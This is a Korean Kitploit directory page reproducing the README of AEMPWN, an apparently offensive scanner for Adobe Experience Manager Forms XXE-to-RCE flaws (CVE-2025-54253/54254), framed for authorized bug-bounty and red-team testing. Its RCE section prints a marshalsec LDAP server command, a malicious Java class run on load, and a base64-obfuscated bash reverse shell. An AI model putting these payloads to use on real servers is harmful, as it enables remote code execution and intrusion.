Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
AEMPWN — CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE 프레임워크 | Kitploit
도구/GitHubGitHub/zoomdbz/aempwn
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubzoomdbz/aempwn

AEMPWN

CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE 프레임워크

저장소 보기
36개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

AEMPWN

CVE-2025-54253 및 CVE-2025-54254를 위한 AEM Forms 스캐너

AEMPWN은 고위험 Adobe Experience Manager (AEM) Forms 취약점을 식별하기 위한 대상 스캐너로, 안전한 탐지, 블라인드 OOB (Out-of-Band) 확인 및 전체 PoC (Proof-of-Concept) 검증 워크플로를 지원합니다. 이 도구는 공인된 보안 테스트 전용으로 설계되었습니다.

지원되는 취약점

CVE-2025-54253
AEM Forms (JEE)에서 구성 종속 원격 코드 실행

CVE-2025-54254
파일 노출 및 잠재적 권한 상승으로 이어지는 XML External Entity (XXE) 삽입

작동 모드

AEMPWN은 실제 버그 바운티 및 레드 팀 워크플로에 맞춰 세 가지 실행 모드를 지원합니다.

1. 안전한 PoC 모드 (--poc)

목적:
파괴적 동작을 유발하지 않고 안전하지 않은 XML 파싱 동작 및 실행 가능한 익스플로잇 표면을 식별합니다.

검증 내용:

  • XML 반사
  • 비 HTML 구조화 응답
  • 카나리 토큰 반사
  • 안전하지 않은 XML 처리의 지표

사용 시기:

  • 낮은 노이즈 검증이 필요할 때
  • 영향을 아직 매핑 중일 때
  • 권한 상승 전 안전한 신호가 필요할 때
    이 모드는 초기 트라이지 및 내부 보고에 적합합니다.

2. OOB XXE 모드 (--oob)

목적:
AEM 서버의 아웃바운드 요청을 통해 블라인드 XXE를 확인합니다.

중요 설명:
Burp Collaborator (또는 유사 서비스)는 아웃바운드 연결만 관찰합니다. 다음을 수행하지 않습니다:

  • 임의 DTD 파일 호스팅
  • 악성 페이로드 제공
  • 공격자 제어 응답 반환
  • LDAP/JNDI 익스플로잇 지원

이 때문에 Collaborator만으로는 완전한 OOB XXE 익스플로잇에 충분하지 않습니다.

필요한 것:

  • 제어 가능한 HTTP 서버 (VPS, 클라우드 인스턴스, 터널링이 있는 로컬 서버 등)
  • DTD 파일을 제공할 수 있는 능력
  • 인바운드 HTTP 요청 및 쿼리 파라미터를 관찰할 수 있는 능력

증명하는 내용:

  • XML 파서가 외부 엔티티를 가져옴
  • 대상이 아웃바운드 네트워크 요청을 수행함
  • 민감한 로컬 파일을 읽고 유출할 수 있음

3. RCE 모드 (--rce)

목적:
P1 수준의 영향을 위해 AEM 서버에서 실제 코드 실행을 입증합니다.

이 모드는 HTTP 콜백 이상의 인프라가 필요한 XML 파싱을 통한 JNDI 인젝션에 의존합니다.

필요한 것:

  • Java 클래스 참조를 제공할 수 있는 실행 중인 LDAP 서버
  • 컴파일된 Java 클래스를 호스팅하는 HTTP 서버
  • 제어된 실행 기본 요소 (예: 파일 생성, 아웃바운드 콜백)

LDAP이 필요한 이유:
XML 파서가 JNDI 참조를 해석하려고 시도하여 AEM 서버가 LDAP 리스너에 연결하도록 합니다. LDAP 응답은 Java 클래스를 가리키며, 해당 클래스가 로드되어 JVM에서 실행됩니다.

최적 도구: marshalsec

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/#Exploit" 1389

http://your-server/#Exploit = Exploit.class (컴파일된 악성 클래스)를 제공하는 HTTP 서버.

악성 클래스 예시 (간단한 touch /tmp/pwned 또는 리버스 셸):

root@kitploit:~
import java.io.IOException;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("touch /tmp/pwned");
            // or reverse shell: Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {}
    }
}

컴파일 → HTTP 서버에 호스팅 (DTD와 동일하거나 별도). AEM이 엔티티를 파싱하면 → LDAP에 연결 → 클래스 가져오기 → 코드 실행.

주요 제한 사항:

Burp Collaborator는 다음을 수행할 수 없습니다:

  • LDAP 응답 제공
  • Java 클래스 호스팅
  • JNDI 기반 클래스 로딩 트리거

이러한 이유로 RCE 모드는 실제 LDAP 서비스 없이 작동할 수 없습니다.

Burp Collaborator 정보

Burp Collaborator (및 유사 플랫폼)는 탐지에만 유용합니다.

다음을 확인할 수 있습니다:

  • DNS 조회
  • HTTP 또는 HTTPS 콜백
  • 블라인드 아웃바운드 연결

다음을 수행할 수 없습니다:

  • DTD 파일 호스팅
  • 유출된 파일 내용 처리
  • Java 클래스 제공
  • JNDI 또는 LDAP 기반 익스플로잇 지원

페이로드를 전달하는 것이 아니라 관찰하는 데 Collaborator를 사용하십시오.

출력

확인된 결과는 출력 파일 (기본값: aem-forms-scan.txt)에 기록되며 다음을 포함합니다:

  • 대상 기본 URL
  • 영향을 받은 엔드포인트
  • 관찰된 탐지 신호
  • 모드별 지표
  • 비디오 PoC 친화적 형식
도구 다운로드